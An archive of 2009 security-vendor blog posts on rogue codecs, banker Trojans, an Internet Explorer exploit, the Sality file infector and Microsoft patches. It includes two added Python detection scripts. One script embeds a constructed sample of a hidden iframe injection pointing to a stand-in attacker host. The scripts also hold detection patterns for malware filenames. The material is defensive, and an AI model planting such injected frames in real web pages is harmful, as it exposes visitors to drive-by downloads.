Archive for February, 2009

Rogue Fake Codec – Finding the differences

February 27, 2009

Over the last few days we have received a good number of new variants of the rogue fake codec. That’s why we propose a little game: find the differences between the images:

Rogue Fake Codecs

All these variants are detected as Adware/VideoPlay. Their behavior is similar: when the program is installed, a file whose name is usually matrix(random numbers).exe or bootmatrix.exe is run. This file spreads by copying itself to removable drives, and it also creates an autorun.inf on them so that it is run whenever they are accessed.

This file collects the data stored in the browsers, such as cookies, passwords, profiles, email accounts, etc., and connects to a remote address to send the information.
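As an added example (not code from the original post or from Panda), here is a small Python check for the spreading mechanism described above: it parses an autorun.inf found on a removable drive and flags entries that launch a file named like matrix(random numbers).exe or bootmatrix.exe. The sample autorun.inf and the filename matrix45372.exe are constructed for illustration.

```python
import configparser
import os
import re

# Constructed sample autorun.inf modelled on the behaviour described in the post:
# the dropped file is named matrix<random digits>.exe or bootmatrix.exe.
SAMPLE_AUTORUN_INF = r"""[autorun]
open=matrix45372.exe
shellexecute=matrix45372.exe
shell\open\command=matrix45372.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
"""

# Filename pattern taken from the post: matrix(random numbers).exe or bootmatrix.exe.
SUSPICIOUS_NAME = re.compile(r"^(bootmatrix|matrix\d+)\.exe$", re.IGNORECASE)

def parse_autorun(text):
    """Return the [autorun] section as a dict of lower-cased key -> value."""
    parser = configparser.RawConfigParser(strict=False, delimiters=("=",))
    try:
        parser.read_string(text)
    except configparser.Error:  # malformed file: treat as empty rather than crash
        return {}
    if not parser.has_section("autorun"):
        return {}
    return dict(parser.items("autorun"))

def find_autorun_threats(text):
    """Return (key, filename) for every entry whose target matches SUSPICIOUS_NAME."""
    hits = []
    for key, value in parse_autorun(text).items():
        if not value.strip():
            continue
        target = value.split()[0].strip('"')   # first token, without quotes
        name = target.replace("/", "\\").rsplit("\\", 1)[-1]   # basename of the target
        if SUSPICIOUS_NAME.match(name):
            hits.append((key, name))
    return hits

def scan_drive_root(root):
    """Check <root>/autorun.inf on a (removable) drive; [] when absent or clean."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return []
    with open(path, "r", errors="replace") as fh:
        return find_autorun_threats(fh.read())
```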

In the last month there has been an increase of almost 400% in the number of samples of this malware received in our inboxes, compared with the previous month.

Increase of Adware/VideoPlay

This nasty piece of malware is the same as the one that was being distributed using Digg and YouTube.

Can we cope with the increasing malware?

February 27, 2009

Recently we published our latest bulletin about the steep increase in banker Trojans. Today there are massive amounts of malware circulating on the Web, and most of it is related to financial or identity theft. See the report: here

The increase in the volume of malware in circulation has been exponential over the last few years. In 2007 we received more malware samples than in the previous 17 years combined. Our forecasts for 2008 indicated that we would end the year with some 7 or 8 million malware strains, however, we actually ended up with over 15 million malware specimens.

To fully understand the explosive increase in samples, you must first understand the characteristics of this new, increasingly complex malware. As you may already know, we rarely face large epidemics triggered by fame-craving virus writers looking to infect thousands of computers. Instead, today's malware writers are heavily focused on monetary gain. The goal of modern-day cyber-criminals is to maximize the profit from their creations.

This is seen in the evolution of the following malware types throughout last year:

Types of malware received at PandaLabs in January 2009

As we have published several times on this blog, there are huge illegal businesses behind this type of cyber-crime today, and criminal organizations are making a lot of profit from identity and data theft.

I'd like to share with you just a glimpse of how we have been able to fight this avalanche. The model that was previously used by the entire industry was clearly unsustainable over time, as it involved technicians manually examining the malware samples received at labs. Given the rate at which malware volume was increasing, how could we possibly answer our clients' needs? How long would that take? Could we keep clients protected? How many technicians would we need in just a few years' time to be able to analyze all these samples? So, in 2006 we decided to stop working like the others and started implementing what we call Collective Intelligence.

I don’t want to go into too much technical detail about this (those of you who are really interested in the subject can download the White Paper we published in early 2008: here). What we basically did was develop a system for automatically detecting, classifying and remediating malware. This approach offers complete real-time protection for users with minimal impact on their systems, as the entire process takes place “in the cloud”. Today, two years after we started implementing this technology in our products:

– We have classified over 17 million malware strains.
– We receive some 25,000 malware samples every day. With Collective Intelligence we can automatically analyze and classify 99.37% of it.
– Our current response time is 30 times shorter than two years ago.

Now that many companies are beginning to talk about cloud computing, it's amazing to think that we implemented this technology over two years ago. The scalability of Collective Intelligence allows us to combat the new malware dynamic with a future-proof concept, as it is clear that the amount of malware in circulation will continue to grow. With Collective Intelligence we can detect new malware very quickly and protect our clients in real time, which is our ultimate goal. Also, as most processes take place in the cloud, our solutions have no impact on our clients’ computers, one of the key objectives we had when developing this technology.

Finally, apart from the technological response that we, as security vendors, must offer to users, I think we also have to do everything possible to report this criminal activity, help public institutions and raise awareness among the general public to stop those that are behind the malware strains we get at our laboratories. This, however, will be the subject of another post.

Malware in Social Media

February 26, 2009

A few weeks ago we talked about cyber-criminals using Digg.com to spread malware. Today we see that the very same group responsible for the Digg.com incident was using the same tactic on YouTube through the use of YouTube's Annotations feature. Video Annotations is a way to add interactive commentary to videos on YouTube.

The following image displays a video using the annotations feature to guide users over to a malware ridden website:

Although the YouTube description malware is not as prevalent as the Digg.com comment abuse, it does show that social media websites are increasingly being used to spread malware. We expect to see plenty of new examples like this throughout 2009.

Thanks to Dancho Danchev for the information.

Good (?) old times II

February 25, 2009

Some days ago we talked about how old infection techniques had re-emerged and how malware with economic goals had been combined with traditional viruses. Today we have come across an interesting case involving one of the rogueware variants recently detected, Antispyware3000.

Antispyware 3000 

The way it works is similar to the rest of the rogue programs: once installed on the computer, it displays warning messages about false infections so that we pay for the product to remove the threats and keep our system protected (which is not true; they will take our money and nothing else). The curious feature of this fake antivirus is that the installer downloaded from its website is itself infected with W32/Jeefo.A, a virus that first appeared in 2003.

We don’t know whether the creators of this fake antivirus have done this on purpose or, on the contrary, they have not been careful enough when dealing with malware and have been given a taste of their own medicine.

Bank details uncovered

February 20, 2009

Olaiz, Technical writer at PandaLabs, has just published an interesting document about one of the main threats to users' privacy: Banking Trojans.

Among other things, you can find information about how they enter computers and how they steal information. One of the most remarkable findings is the complex structure behind this lucrative criminal business. You may think that the creators of banker Trojans are the same individuals who actually steal the money. However, it isn't as simple as that, as you can see in the image below:

If you want to know how to interpret this diagram and are interested in knowing more about these threats, you can click the image below to access the document:

Spanish | English

Finally, just a reminder that in our PandaLabs Reports section you can access the papers that PandaLabs has published.

MS09-002 Exploit in the Wild

February 19, 2009

Last Tuesday Microsoft released a Security Bulletin (MS09-002) for critical vulnerabilities affecting its Internet Explorer browser. The vulnerability exists because of improper error handling when accessing deleted objects, and it allows remote code execution through a specially crafted website.

Exploit Code

This week a few websites in China started actively exploiting this vulnerability; the malware they drop (jc.exe and wininet.dll) is detected as Spyware/Virtumonde. The websites involved in this example have been blocked by Panda’s Identity Protect Technology, which stops Panda's users from reaching the exploit sites.

We recommend applying Microsoft's patch immediately.

Good (?) old times

February 17, 2009

Right now we are dealing with about 25,000 new malware samples per day. From time to time we remember the old days, when we were almost fighting each other in order to disassemble the latest virus we had received in the lab. Well, what were you expecting? We're freaks 😉

But the reality is that nowadays most malware consists of Trojans, rogueware, etc. We are talking mainly about non-polymorphic, non-viral malware, and the main problem we encounter is packers or similar tricks trying to evade AV signature detection, which is not a big deal when you have technologies such as TruPrevent that watch the behaviour of the program rather than the static file itself.

Malware evolves, and so do antimalware technologies. That’s why in our last Annual Report I predicted that this year we would see an increase in the use of old techniques as a way to evade some of the technologies the top AV vendors are using: old virus tricks, mixing virus and Trojan behaviours, etc. It turns out that this change is already happening. In the first week of February a new virus appeared, which we called W32/Sality.AO.

Why is this new variant of a well-known file infector worth mentioning? Well, first, it is smart enough to avoid being too promiscuous: it will not scan the whole hard drive looking for files to infect, but will just infect some files when the malicious code runs and will also infect any new files that we run on our computer. Furthermore, it uses very complex techniques to infect PE files: EPO, cavity infection, different encryption layers… and not always in the same way; one sample may be infected using EPO and 1 encryption layer, another using EPO, cavity and 2 encryption layers, and so on. If this wasn’t enough, it connects to an IRC server in order to receive commands. Even more, it will try to download files from the Internet in order to infect our computer with more malware. It also infects (I’d rather say "modifies") .PHP, .ASP and .HTML files by inserting an iFrame tag into them. When any of these “infected” files is visited through our web browser, it will use an exploit in order to download and run a new file. This file is double malware: a Trojan downloader infected with a virus.
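As an added example, not code from the original post, the following Python scanner looks for the iFrame injection described above in .PHP, .ASP and .HTML files, flagging frames that point off-site, are 1x1 pixels, or are styled invisible. The sample page and the host name attacker.example are constructed placeholders, not indicators from the post.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample of a page modified the way the post describes: a hidden 1x1 iframe
# appended after the closing </html> tag. The host name is a placeholder, not a real IoC.
INJECTED_HTML = """<html><body><h1>Welcome</h1></body></html>
<iframe src="http://attacker.example/in.cgi?3" width="1" height="1" style="visibility:hidden"></iframe>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")

def iframe_attrs(tag):
    """Map of lower-cased attribute name -> unquoted value for one <iframe ...> tag."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag)}

def _px(value):
    # Leading integer of a width/height attribute ('1', '1px'); None if absent.
    m = re.match(r"\d+", value or "")
    return int(m.group()) if m else None

def is_suspicious_iframe(tag, trusted_hosts):
    """Flag frames that point off-site, are at most 1x1 pixels, or are styled invisible."""
    attrs = iframe_attrs(tag)
    host = urlparse(attrs.get("src", "")).hostname   # None for relative URLs
    external = host is not None and host.lower() not in trusted_hosts
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    tiny = w is not None and h is not None and w <= 1 and h <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden = "visibility:hidden" in style or "display:none" in style
    return external or tiny or hidden

def find_injected_iframes(html, trusted_hosts=()):
    """Return the suspicious <iframe> tags found in one file's contents."""
    trusted = {h.lower() for h in trusted_hosts}
    return [t for t in IFRAME_RE.findall(html) if is_suspicious_iframe(t, trusted)]

def scan_web_root(root, trusted_hosts=(), exts=(".php", ".asp", ".html", ".htm")):
    """Walk a web root and map each file of the targeted types to its suspicious iframes."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", errors="replace") as fh:
                    hits = find_injected_iframes(fh.read(), trusted_hosts)
                if hits:
                    findings[path] = hits
    return findings
```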

And here we were missing some good old polymorphic and self-replicating action. Another variant of W32/Sality just came in. Looks like we're not going to get much sleep tonight. 

Defacement archive of Zone-H gets defaced

February 17, 2009

Several days ago, one of the main archives containing records of the web defacement attacks carried out all over the world was itself the victim of a web defacement. It is not the first time that Zone-H.org has received this type of attack; in January 2007 it was the victim of a similar one.

A defacement consists of accessing a website illegally (by malicious means) and changing its home page to display claim messages or any kind of graffiti.

Zone-H

Below, you can see the defacement that has affected the Zone-H website.

Blogger Summit recap

February 12, 2009

Last week, Panda Security hosted the First Security Blogger Summit at the Círculo de Bellas Artes in Madrid. Over 200 people involved in IT security attended this inaugural event, which included 11 security thought leaders from the United States and Spain debating in an engaging roundtable.

It was inspiring and energizing to hear the world’s foremost security experts put their minds together to tackle the tough issues that we face in IT security today.

Some of the attendees already posted their reactions to the event – Andy Willingham particularly enjoyed the lively debate about Security Awareness Training. Steve Ragan gave a great synopsis of the event overall, stressing how he believes events like these are extremely important to facilitate an ongoing dialogue. Steve suggested in his post that Panda include consumers as well as security experts in the next roundtable to hear what consumers’ perspective is – good idea, Steve!

Video Coverage:

Cybercrime and Security 1: http://www.youtube.com/watch?v=jy-kkIhN7wM
Cybercrime and Security 2: http://www.youtube.com/watch?v=DPCuAb3xFTA
Quotes: http://www.youtube.com/watch?v=IrENqCujdmw
http://www.youtube.com/watch?v=Lgv85sWQv7k

Bruce Schneier´s introduction: http://www.youtube.com/watch?v=gHKSL_H35FY

Education and Proactive Protection
The session started with a 15-minute talk from Bruce Schneier. He emphasized the major advance that the Internet represents, calling it “one of the most important revolutions after Rock and Roll” and highlighting the economic factors that underlie security problems: “We could have better technology, but we are not prepared to pay for it. The market rewards the cool and the fast, but not the good.”

He also raised the issue of passing the responsibility of security onto our governments, stressing how users and companies must play an active role in protecting themselves. Byron Acohido countered with, “90% of the problem is not down to the user. If a system with errors is launched on the market, this is not a problem of the user.”

Francisco Lago jumped in, stating, “The main problem is user behavior. Awareness campaigns about best practices were the most effective vehicle for avoiding security risks.” Andy Willingham and Steve Ragan agreed on the need for experts to lead this education, but with simple, comprehensible language. “There are blogs and security media, but users do not understand them; and as long as they don't, we will continue to see the same errors time and time again,” emphasized Ragan.

Current situation and responses to cyber-crime
All speakers agreed that one of the main trends of the last few years has been the professionalization of cyber-criminals. Cesar Lorenzana explained, “It's not that there is more malware, it's that malware is now profitable for criminals. It's a way of earning a living.” Francisco Lago stressed the false sense of security among users, “80% of users believe that their computers are protected, yet three quarters of them are infected.”

Antonio Ortiz illustrated the lengths that cyber-crooks go to in order to keep a low profile and prevent public institutions from pursuing them: “Owners of botnets do not offer services for DoS attacks on major websites or government pages because then politicians would focus on the problem. They don't want that kind of attention.”

Roundtable participants:

  • Bruce Schneier, one of the most influential security theorists in the world
  • Byron Acohido, technology journalist for USA Today and author of “Zero Day Threat”
  • Steve Ragan, security editor for The Tech Herald
  • Andy Willingham, author, blogger, and IT professional with expertise in financial services
  • Ero Carrera, Chief Research Officer of Collaborative Security, VirusTotal – Hispasec
  • Antonio Ortiz, co-founder of Weblogs SL and editor of ERROR500
  • Javier Villacañas, editor, network chief COP and founder of “A Todo Chip” blog

Check out our photos of the event on Flickr here:
http://www.flickr.com/photos/panda_security/tags/summit/

Microsoft Updates – February 2009

February 11, 2009

Microsoft has published the security bulletins MS09-002, MS09-003, MS09-004 and MS09-005, which cover 8 vulnerabilities. 3 are critical, and 2 of them affect the Internet Explorer browser again. These 2 vulnerabilities could allow remote code execution if users visit a specially crafted website. The other critical vulnerability affects versions 2000 Service Pack 3, 2003 Service Pack 2 and 2007 Service Pack 1 of Microsoft Exchange Server and allows remote code execution by sending a specially modified email message.

The other 5 have been rated as important by Microsoft; one of them also affects Microsoft Exchange Server 2003 Service Pack 2 and Microsoft Exchange 2007 Service Pack. If exploited successfully, it causes a denial of service on the target server when a specially modified MAPI command is sent to it.

Another vulnerability affects several versions of Microsoft SQL Server and can be exploited through the stored procedure sp_replwritetovarbin. This vulnerability can also be exploited through websites vulnerable to SQL injection attacks. The 3 other vulnerabilities affect Microsoft Visio and could allow a malicious user to execute remote code if a specially crafted Visio file is created.

You can obtain more information about these vulnerabilities in the following links:

MS09-002 MS09-003 MS09-004 MS09-005